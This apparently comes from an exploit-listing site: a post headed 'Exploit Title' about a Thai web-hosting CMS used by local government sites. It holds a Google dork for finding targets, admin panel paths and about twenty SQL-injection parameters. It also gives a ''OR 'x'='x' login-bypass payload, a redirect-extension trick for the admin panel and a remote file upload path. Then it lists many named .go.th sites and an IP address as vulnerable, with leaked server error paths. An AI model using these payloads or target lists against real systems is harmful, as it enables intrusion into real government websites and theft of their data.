facebook facebook twitter rss

TimesMedia.Co.Th WebHosting ThailandGov Multiple Vulnerabilities

Author: KingSkrupellos , Published: 09-10-2018
#################################################################################################

# Exploit Title : TimesMedia.Co.Th WebHosting ThailandGov Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/10/2018
# Vendor Homepage : timesmedia.co.th/web58/index.php
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-592 [ Authentication Bypass Issues ]

#################################################################################################

# CopyRight © 2015 www.timesmedia.co.th All Rights Reserved

# Google Dork :

inurl:''/select_news.php?news_id='' site:go.th

# Note : Thailand Government WebSites are vulnerable.

# Admin Control Panel Login Path :

/login_form.php
/admin.php

# SQL Injection Exploits :

/contact.php?content_id=[SQL Injection]

/base.php?content_id=[SQL Injection]

/council.php?content_id=[SQL Injection]

/history.php?content_id=[SQL Injection]

/person.php?content_id=[SQL Injection]

/vision.php?content_id=[SQL Injection]

/memorable.php?content_id=[SQL Injection]

/council.php?content_id=[SQL Injection]

/travel.php?content_id=[SQL Injection]

/stucture.php?content_id=[SQL Injection]

/admin1.php?content_id=[SQL Injection]

/otop.php?content_id=[SQL Injection]

/news.php?id_type=[SQL Injection]

/select_news.php?news_id=[SQL Injection]

/policy.php?content_id=[SQL Injection]

/office.php?content_id=[SQL Injection]

/data.php?content_id=[SQL Injection]

/strategy_plan.php?content_id=[SQL Injection]

/activity/user_select_photo.php?news_id=[SQL Injection]

/vdo/user_select_youtube.php?yt_id=[SQL Injection]

Unauthorized Topic Add without Administrator Permission Exploit =>

TARGET/webboard/new.php?category=webboard

TARGET/webboard/index.php?category=webboard

Note : Use Mozilla Firefox Open Link No Redirect Extension to Bypass Admin Control Panel

Download and Install on your Browser =>

addons.mozilla.org/en-US/firefox/addon/noredirect/

addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/

Try to use one of the SQL Authentication Exploit Payloads below if not works =>

Admin Username : anything' OR 'x'='x

Admin Password : anything' OR 'x'='x

Directory File Path : /fileupload/....

Directory File Path : /activity/images/....

Remote File Upload Exploit =>

TARGET/admin/FCKeditor/editor/filemanager/upload/test.html

/UserFiles/....

Note : Only Thailand Government WebSites [ go.th ] are vulnerable for this issue.

#################################################################################################

# Example Vulnerable Sites => Vulnerable IP Address => 61.19.250.25

Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php

makluakao.go.th/webboard/index.php?category=webboard => [ Proof of Concept ] => archive.is/azGk4

phoklang.go.th/news.php?id_type=4%27 => [ Proof of Concept for RFU Vuln ] => archive.is/8wk57

banthan.go.th/policy.php?content_id=1%27 => [ Proof of Concept for SQL Inj ] => archive.is/lkrrB

chongsammor.go.th/select_news.php?news_id=410%27

dondang.go.th/base.php?content_id=7

hanna-ngam.go.th/admin1.php?content_id=10%27

wattananakhon.go.th/news.php?id_type=6%27

klonghinpoon.go.th/vision.php?content_id=5%27

nongpailomcity.go.th/data.php?content_id=1%27

banphokorat.go.th/data.php?content_id=4%27

buakho.go.th/history.php?content_id=4%27

janaud.go.th/stucture.php?content_id=27%27

waengnoiy.go.th/data.php?content_id=1%27

huanong.go.th/news.php?id_type=21%27

banthan.go.th/policy.php?content_id=1%27

# SQL Database Error =>

Warning: simplexml_load_file(): php_network_getaddresses: getaddrinfo failed:
Name or service not known in /home/huanong/domains/huanong.go.th/public_html/egp.php on line 137
Warning: simplexml_load_file(http://process3.gprocurement.go.th/EPROCRssFeedWeb/
egpannouncerss.xml?deptId=6401010&anounceType=W0): failed to open stream: php_network_getaddresses:
getaddrinfo failed: Name or service not known in /home/huanong/domains/huanong.go.th/public_html/egp.php
on line 137 Warning: simplexml_load_file(): I/O warning : failed to load external entity "http://process3.
gprocurement.go.th/EPROCRssFeedWeb/egpannouncerss.xml?deptId=6401010&anounceType=W0"
in /home/huanong/domains/huanong.go.th/public_html/egp.php on line 137 Error: Cannot create object

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/banthan/
domains/banthan.go.th/public_html/policy.php on line 229 Warning: mysql_fetch_array() expects
parameter 1 to be resource, boolean given in /home/banthan/domains/banthan.go.th/public_html/policy.php on line 233

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/phoklang/
domains/phoklang.go.th/public_html/news.php on line 129

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/phoklang/
domains/phoklang.go.th/public_html/news.php on line 150

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/phoklang/
domains/phoklang.go.th/public_html/news.php on line 187

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/phoklang/
domains/phoklang.go.th/public_html/news.php on line 198

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :